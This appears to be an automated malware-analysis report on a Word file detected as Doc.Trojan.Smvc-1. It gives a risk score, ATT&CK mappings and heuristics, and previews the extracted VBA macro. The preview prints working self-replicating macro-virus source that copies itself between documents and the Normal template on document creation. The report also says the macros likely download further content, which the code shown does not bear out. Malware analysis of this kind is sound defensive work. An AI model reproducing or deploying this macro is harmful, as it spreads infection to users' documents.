MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Smvc-1. Static analysis revealed the presence of VBA macros within the document. These macros are highly suspicious and likely intended to download and execute additional malicious content, a common tactic for initial compromise. The file's SHA256 hash is provided as a primary IOC.
Heuristics 2
-
ClamAV: Doc.Trojan.Smvc-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Smvc-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4197 bytes |
SHA-256: 2a65c58470bee8ac39fb1677adf747cd5488f01703688cf46c04c4aca2c0bd12 |
|||
|
Detection
ClamAV:
Doc.Trojan.Smvc-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* '$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* ' __ __ ' | | | | ' _|__|_|__|_ ____ ____ _________ _________ _________ ____ ____ ___ ________ '/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ '| ________| | \ / | | ___ | | ___ | | | | | | | | | | _____/ '| | | \/ | | / \ | | / \ | | | | | | | \___/ | | '| |________ | | | | | | | | | | |__ __| | |_| | ___ | |__ '| \ | | | | | | | | | | | | | | | | | | '|______ | | |\ /| | | | | | | | | | | | | _ | | | | __| ' | | | | \/ | | | | | | | | | | | | | | | | | | | | ' ______| | | | | | | \___/ | | \___/ | | | | | | | | | | |____ '| | | | | | | | | | | | | | | | | | | \ '\___________/ \____/ \____/ \_________/ \_________/ \___/ \____/ \____/ \___/ \________/ ' | | | | - $MOOTHiE Da HuStla [ZeroGravity] ' |__| |__| - August 15, 2000 ' '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* '$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ '*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* 'Virus Creation: 09/09/00 13.39.58 '$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ '$* Poly = No $* '$* Retro = No $* '$* Infection = New $* '$* Payload = No $* '$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ |-----====== CODE Starts ======-----| Private Sub Document_New() On Error Resume Next 'Author: 1 'Name: 1 'Comments: 1 'Origin: 1 'This Word2000 virus was created using $MOOTHiE Da HuStla's Macro Virus Creator 2000 Ver 2.0 On Error Resume Next: Randomize: Dim DocCode As Object, NormCode As Object Set AAA1 = Activedocument: Set AAA2 = AAA1.VBProject: Set AAA3 = AAA2.VBComponents Set AAA4 = AAA3.Item(1): Set DocCode = AAA4.CodeModule Set BBB1 = NormalTemplate: Set BBB2 = BBB1.VBProject: Set BBB3 = BBB2.VBComponents Set BBB4 = BBB3.Item(1): Set NormCode = BBB4.CodeModule XXXA = (23250758647918.7 - 23250758647918.7 + 46450978517.0678 + 46450978517.0678 - (46450978516.5678 * 2)) XXXB = (23250758647918.7 - 23250758647915.7 + 46450978517.0678 + 46450978517.0678 - (46450978517.0678 * 2)) AAA = NormCode.lines(XXXB, XXXA) BBB = DocCode.lines(XXXB, XXXA) CCC = "" If AAA = CCC Then GoTo XXXC If BBB = CCC Then GoTo XXXD XXXC: Do Until XXXE = DocCode.countoflines XXXE = XXXE + XXXA AAA = AAA + DocCode.lines(XXXE, XXXA) & vbCr Loop NormCode.insertlines XXXA, AAA GoTo XXXF XXXD: Do Until XXXE = NormCode.countoflines XXXE = XXXE + XXXA AAA = AAA + NormCode.lines(XXXE, XXXA) & vbCr Loop DocCode.insertlines XXXA, CCC XXXF: Activedocument.Save: NormalTemplate.Save End Sub Private Sub Document_Close() On Error Resume Next End Sub |-----====== CODE Ends ======-----| *$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$* $*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.